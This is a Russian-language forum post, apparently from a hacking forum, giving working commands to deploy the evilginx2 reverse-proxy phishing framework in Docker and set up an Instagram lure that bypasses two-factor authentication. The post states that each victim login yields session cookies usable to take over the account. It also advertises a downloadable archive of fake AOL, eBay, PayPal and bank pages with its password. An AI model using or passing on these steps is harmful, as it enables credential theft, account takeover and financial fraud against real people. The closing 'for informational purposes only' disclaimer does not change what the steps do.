cd evilginx2
docker build . -t evilginx2
docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2



Интерактивный шелл который открылся умеет help. С этого момента можно выбрать
любой из сервисов, я покажу на примере instagram:

Code:Copy to clipboard



config domain example.org # подставить свое
config ip 10.0.0.23 # подставить свое
phishlets hostname instagram insta2.exmaple.org # подставить свое
phishlets enable instagram
lures create instagram
lures get-url 0
https://www.insta2.example.org/oEnQzLHb



По ссылке для фишинга(<https://www.insta2.example.org/oEnQzLHb>) полная копия
оригинального instagram с возможностью авторизации 2fa.

Каждый ввод ввод данных генерит сессию, с любой из сессий можно забрать куки,
и воспользоваться ими для входа в сервис.


**фейки*:**

* AOL
* eBay
* PayPal
* PNC-Bank
* US Bank ASP

Spoiler: 15

_http://rapidshare.de/files/12415158/scams_loc.rar.html

Spoiler: 20

пасс: locator


\---
*-Fake(фейк) в переводе с английского-подделка,обман.
\---
ТОлько для ознакомления.